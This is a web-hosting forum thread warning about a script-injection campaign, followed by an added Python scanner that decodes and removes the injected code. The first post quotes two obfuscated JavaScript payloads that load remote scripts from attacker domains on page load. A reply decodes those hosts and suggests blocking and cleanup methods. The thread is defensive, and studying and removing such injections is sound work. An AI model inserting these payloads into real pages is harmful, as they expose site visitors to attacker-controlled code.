[INFO] Metamorphic Iframe Virus


Status
Not open for further replies.

PusatHosting

Hosting Guru
Just FYI: iframe-injection viruses are becoming rampant again, to the point that the DC has given us a warning.

This virus can now inject dozens of .JS scripts.

Variant 1
<script>/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 = document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type', 'text/javascript');Hva23p3hnyirlpv7.setAttribute('id', 'myscript1');Hva23p3hnyirlpv7.setAttribute('src', 'h))t#^t$#))!p&&#:^!&/^^/)^(@m&()y&#b(r@&&!!o)^w(&(s)^)$e(@&#r&))b^a#r!&$-#@c&#o#m#@&.)@$s)a!m$&s#)^u!$^n$g#!.$c!^o^@(m#.^n@!#a@@s#$!a#&-(@^g$o)#v)@&$.(!(@(e)&g&!#r)e)@)a^)t$!s(!(a@!l#e@.@)@r)#u(&#!:)@8!^)0!8$!(0!/^#m$$e)g^&a###v&!i&d!e))#o!@(.(@c&)o$!(m^&/^m&^e((^)g$!((a)#)^v@!i(@&#d#)e@&o$#.^c$!#o@m^/$#&l$a)r#@(e)^^d#&o(!()u#(t$)e##.$f(r^&(@/!(^&b!!i)$$l@)!)d^&.#@&(d$@$e(/)g$o^o$&^g^!&l()e!).(@^#c)$!o#&)@@m!/^$'.replace(/\$|\^|\!|&|\)|\(|@|#/ig, ''));Hva23p3hnyirlpv7.setAttribute('defer', 'defer');document.body.appendChild(Hva23p3hnyirlpv7);}} catch(e) {}</script>

Variant 2
<script>/*LGPL*/ try{ window.onload = function(){var Wzw6mi0yfxh = document.createElement('s)$c!!r!!i&$p)$t&'.replace(/\$|@|\!|&|#|\(|\)|\^/ig, ''));Wzw6mi0yfxh.setAttribute('defer', 'd)$$&e#^$f)$e)!&r$#'.replace(/\^|#|\$|\(|\)|@|\!|&/ig, ''));Wzw6mi0yfxh.setAttribute('type', 't@e!$^x)!#t!&/$(!)j(!a^$v)a^))s(!c^r#@$i@$(#p$t)&'.replace(/\)|&|#|@|\^|\(|\!|\$/ig, ''));Wzw6mi0yfxh.setAttribute('id', 'E^!j#@^#5&(^#q!!z(#q!&c#^d!!4(#z@l@@@#'.replace(/\!|\$|&|\(|\)|\^|@|#/ig, ''));Wzw6mi0yfxh.setAttribute('s&(r^!@c)#('.replace(/\!|\(|&|\$|@|\^|#|\)/ig, ''), 'h#t#&@t^&p(@):)&)/^!$/)l)e&b)!o)$n^@c!!(o)i#n$$-#f@$r@((.!$#&m@#a&^i)()n&&@i&#c(h(^i(^.$)$j(p$(#.!^!s)o&$n))$^i!(^c&!o$&@-@c@#o!(^^m&$.@t#h)^e(^l$a(c@$!e)@&)!w(e$b#!.(r^)u^$!:mad:$^8$0^$8)!0)&(/^&g@o$$!#o&$g!)!l#)&e$.!^$c(@@o&m!#&^/@!g^o)@^#o(^g)@l!!#^e^&.)c$&$@o^&m&($/!!&(v)!i@!r)(g#@@i$#n$^^@m#e@(^@d)#i$!a@@.^c(#o^@m(!^/&h$(u$#f&!&f#i#^n^#!g&#&t$!o&$!n&&p)&o@s#^(t&).$$$c)$$o@m$#!/)#n(i(n$(@(g$((.$)#c!o$!$m)/&('.replace(/&|\)|\$|#|@|\(|\^|\!/ig, ''));if (document){document.body.appendChild(Wzw6mi0yfxh);}} } catch(Pxbfkbch1d1sq271kl4tb) {}</script>
<!--487d9122241bbf0730e5cc7447f5ef1d-->

Run this command:

# find . -type f -name '*.*' -print0 | xargs -0 perl -pi -e 's/<script>\/\*GNU GPL\*\/ try.*?Hva23p3h.*?\}<\/script>//g'

Just adjust the regex to match the characteristics of the virus.
 

IIXPLANET

Expert 2.0
- setAttribute('src', 'h))t#^t$#))!p&&#:^!&/^^/)^(@m&()y&#b(r@&&!!o)^w(&(s)^)$e(@&#r&))b^a#r!&$-#@c&#o#m#@&.)

=> mybrowserbar.com


- 'h#t#&@t^&p(@)&)/^!$/)l)e&b)!o)$n^@c!!(o)i#n$$-#f@$r@

=> eboncoin.com


- @i&#c(h(^i(^.$)$j(p

=> ichi.jp


- w(e$b#!.(r^)u^ $!:@$^8$0^$8)!0)

=> web.ru:8080

This virus is a kind of onload popup, bro.

It can also be set in the mod_sec rules config to block onload requests to those sites.


To make it easier, bro, just create a Perl / bash file containing several removal commands with queries targeting the virus's patterns, combined with an automatic daily cron job, so that searching and removal happen automatically.
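
An added example, not part of the thread: a scanner of the kind suggested above for a daily cron job. It matches the obfuscation pattern both variants share instead of one variant's variable name, decodes the padded strings the way the second post did by hand, and can strip the injected element. The sample host, the variable name `Aa1` and the `--fix` flag are made up for the illustration.

```python
import re
import sys
from pathlib import Path

# One injected element as in both variants above: licence-comment decoy,
# try{...} catch(<name>) {}, all on a single line ('.' does not cross newlines).
INJECTED = re.compile(
    r"<script>/\*(?:GNU GPL|LGPL)\*/\s*try\s*\{.*?\}\s*catch\(\w+\)\s*\{\}</script>")
# A junk-padded literal plus the runtime clean-up: '...'.replace(/\$|\^|.../ig, '')
OBF = re.compile(r"'([^']*)'\.replace\(/([^/]+)/ig,\s*''\)")

def decode(literal, junk_regex):
    """Strip the junk symbols without executing the attacker-supplied regex."""
    junk = {alt[-1] for alt in junk_regex.split("|") if alt}  # '\$' -> '$'
    return "".join(ch for ch in literal if ch not in junk)

def scan_text(text):
    """Decoded strings (URLs, attribute names) of every injected script in text."""
    return [decode(lit, junk)
            for block in INJECTED.findall(text)
            for lit, junk in OBF.findall(block)]

def clean_text(text):
    """Remove the injected elements, leaving the rest of the line untouched."""
    return INJECTED.sub("", text)

def scan_tree(root, fix=False):
    """Map each infected file under root to its decoded strings; strip if fix."""
    report = {}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        text = path.read_bytes().decode("latin-1")  # lossless for any byte
        hits = scan_text(text)
        if hits:
            report[str(path)] = hits
            if fix:
                path.write_bytes(clean_text(text).encode("latin-1"))
    return report

# Constructed sample in the shape of variant 1; host and variable name are made up.
SAMPLE = (r"<p>ok</p><script>/*GNU GPL*/ try{window.onload = function(){"
          r"var Aa1 = document.createElement('script');Aa1.setAttribute('src', "
          r"'h#t)t$p!:&/^/@e(x#a)m$p!l&e^.@i(n#v)a$l!i&d^:@8(0#8)0$/!x&/'"
          r".replace(/\$|\^|\!|&|\)|\(|@|#/ig, ''));"
          r"document.body.appendChild(Aa1);}} catch(e) {}</script><p>tail</p>")

if __name__ == "__main__":  # usage: scan.py <webroot> [--fix]
    root = next((a for a in sys.argv[1:] if a != "--fix"), ".")
    for name, urls in scan_tree(root, fix="--fix" in sys.argv).items():
        print(name, *urls)
```

Run it without `--fix` first and review the report; the decoded hosts it prints are the values to feed into a blocking rule.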
 